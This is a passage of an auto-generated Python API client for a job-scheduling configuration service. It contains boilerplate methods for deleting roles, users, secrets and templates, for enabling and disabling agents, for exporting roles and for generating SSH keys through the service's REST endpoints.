collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_host_from_group(self, server, hostgroup, host, **kwargs): # noqa: E501 """delete an agent from a hostgroup # noqa: E501 Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_from_group(server, hostgroup, host, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param str host: The agent to be deleted (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501 else: (data) = self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501 return data def delete_host_from_group_with_http_info(self, server, hostgroup, host, **kwargs): # noqa: E501 """delete an agent from a hostgroup # noqa: E501 Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_from_group_with_http_info(server, hostgroup, host, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param str host: The agent to be deleted (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup', 'host'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_host_from_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_host_from_group`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_from_group`") # noqa: E501 # verify the required parameter 'host' is set if self.api_client.client_side_validation and ('host' not in params or params['host'] is None): # noqa: E501 raise ValueError("Missing the required parameter `host` when calling `delete_host_from_group`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 if 'host' in params: path_params['host'] = params['host'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}/agent/{host}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AgentsInGroupSuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_host_group(self, server, hostgroup, **kwargs): # noqa: E501 """delete host group # noqa: E501 delete host group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_group(server, hostgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_host_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501 else: (data) = self.delete_host_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501 return data def delete_host_group_with_http_info(self, server, hostgroup, **kwargs): # noqa: E501 """delete host group # noqa: E501 delete host group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_group_with_http_info(server, hostgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_host_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_host_group`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_group`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_pgp_template(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete PGP Template # noqa: E501 Delete PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_pgp_template(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 else: (data) = self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 return data def delete_pgp_template_with_http_info(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete PGP Template # noqa: E501 Delete PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_pgp_template_with_http_info(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_pgp_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_pgp_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_pgp_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `delete_pgp_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_role_from_ldap_group(self, ldapgroup, role, **kwargs): # noqa: E501 """Delete a role from LDAP group # noqa: E501 Delete a role from LDAP group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_role_from_ldap_group(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 else: (data) = self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 return data def delete_role_from_ldap_group_with_http_info(self, ldapgroup, role, **kwargs): # noqa: E501 """Delete a role from LDAP group # noqa: E501 Delete a role from LDAP group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_role_from_ldap_group_with_http_info(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['ldapgroup', 'role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_role_from_ldap_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ldapgroup' is set if self.api_client.client_side_validation and ('ldapgroup' not in params or params['ldapgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `ldapgroup` when calling `delete_role_from_ldap_group`") # noqa: E501 # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `delete_role_from_ldap_group`") # noqa: E501 collection_formats = {} path_params = {} if 'ldapgroup' in params: path_params['ldapgroup'] = params['ldapgroup'] # noqa: E501 if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/ldap/{ldapgroup}/role/{role}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_run_as_user(self, server, agent, user, **kwargs): # noqa: E501 """delete Run-as user # noqa: E501 Delete Run-as user from server # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_run_as_user(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 else: (data) = self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 return data def delete_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501 """delete Run-as user # noqa: E501 Delete Run-as user from server # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_run_as_user_with_http_info(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `delete_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_secret(self, name, **kwargs): # noqa: E501 """Delete an existing secret # noqa: E501 Delete an existing secret from the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_secret(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_secret_with_http_info(name, **kwargs) # noqa: E501 else: (data) = self.delete_secret_with_http_info(name, **kwargs) # noqa: E501 return data def delete_secret_with_http_info(self, name, **kwargs): # noqa: E501 """Delete an existing secret # noqa: E501 Delete an existing secret from the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_secret_with_http_info(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in params or params['name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name` when calling `delete_secret`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['name'] = params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secret/{name}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_user(self, user, **kwargs): # noqa: E501 """Delete user # noqa: E501 Delete user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_user(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_user_with_http_info(user, **kwargs) # noqa: E501 else: (data) = self.delete_user_with_http_info(user, **kwargs) # noqa: E501 return data def delete_user_with_http_info(self, user, **kwargs): # noqa: E501 """Delete user # noqa: E501 Delete user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_user_with_http_info(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `delete_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_zos_template(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete z/OS Template # noqa: E501 Delete z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_zos_template(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 else: (data) = self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 return data def delete_zos_template_with_http_info(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete z/OS Template # noqa: E501 Delete z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_zos_template_with_http_info(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `delete_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def disable_agent(self, server, agent, **kwargs): # noqa: E501 """disable agent from the Server # noqa: E501 Disable an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.disable_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be disabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def disable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """disable agent from the Server # noqa: E501 Disable an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.disable_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be disabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method disable_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `disable_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `disable_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/disable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def enable_agent(self, server, agent, **kwargs): # noqa: E501 """enable agent from the Server # noqa: E501 Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.enable_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be enabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def enable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """enable agent from the Server # noqa: E501 Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.enable_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be enabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method enable_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `enable_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `enable_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/enable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def export_role(self, role, **kwargs): # noqa: E501 """Export Authorization Role # noqa: E501 Export Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.export_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleDataFull If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.export_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.export_role_with_http_info(role, **kwargs) # noqa: E501 return data def export_role_with_http_info(self, role, **kwargs): # noqa: E501 """Export Authorization Role # noqa: E501 Export Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.export_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleDataFull If the method is called asynchronously, returns the request thread. """ all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method export_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `export_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}/export', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleDataFull', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def generate_mft_rsa_ssh_key(self, server, agent, ssh_key_properties, **kwargs): # noqa: E501 """Generate RSA SSH Key # noqa: E501 Generate RSA SSH Key pair for SFTP account authentication # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.generate_mft_rsa_ssh_key(server, agent, ssh_key_properties, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param SshKeyProperties ssh_key_properties: Ssh Key pair properites (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, **kwargs) # noqa: E501 else: (data) = self.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, **kwargs) # 